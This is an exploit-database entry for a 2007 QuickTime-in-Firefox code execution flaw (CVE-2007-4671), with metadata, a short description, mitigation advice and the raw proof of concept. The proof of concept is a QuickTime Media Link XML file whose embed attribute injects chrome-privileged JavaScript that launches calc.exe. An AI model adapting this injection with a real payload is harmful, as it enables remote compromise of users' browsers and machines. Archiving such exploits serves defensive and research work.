QuickTime media formats vulnerability in Firefox

vendor:

QuickTime

by:

Unknown

CVSS

CRITICAL

Remote Code Execution

CWE

Product Name: QuickTime

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: YES

Related CWE: CVE-2007-4671

CPE: a:apple:quicktime

Metasploit: https://www.rapid7.com/db/vulnerabilities/apple-osx-webcore-cve-2007-4671/

Other Scripts:

Platforms Tested: Windows

2007

QuickTime media formats vulnerability in Firefox

This vulnerability allows QuickTime media formats to execute arbitrary code in Firefox, potentially leading to a full compromise of the browser and underlying operating system. The exploit uses a specially crafted embed element in an XML file to execute a JavaScript command that launches the Windows calculator (calc.exe).

Mitigation:

To mitigate this vulnerability, users should update their versions of QuickTime and Firefox to the latest available versions. Additionally, users should exercise caution when opening or accessing media files from untrusted sources.

Source

Exploit-DB raw data:

<!--
http://www.gnucitizen.org/blog/0day-quicktime-pwns-firefox

It seams that QuickTime media formats can hack into Firefox. 
The result of this vulnerability can lead to full compromise of 
the browser and maybe even the underlaying operating system. 
Don't try this at home.
-->

<?xml version="1.0">
<?quicktime type="application/x-quicktime-media-link"?>
<embed src="a.mp3" autoplay="true" qtnext="-chrome javascript:file=Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath('c:\\windows\\system32\\calc.exe');process=Components.classes['@mozilla.org/process/util;1'].createInstance(Components.interfaces.nsIProcess);process.init(file);process.run(true,[],0);void(0);"/>

# milw0rm.com [2007-09-12]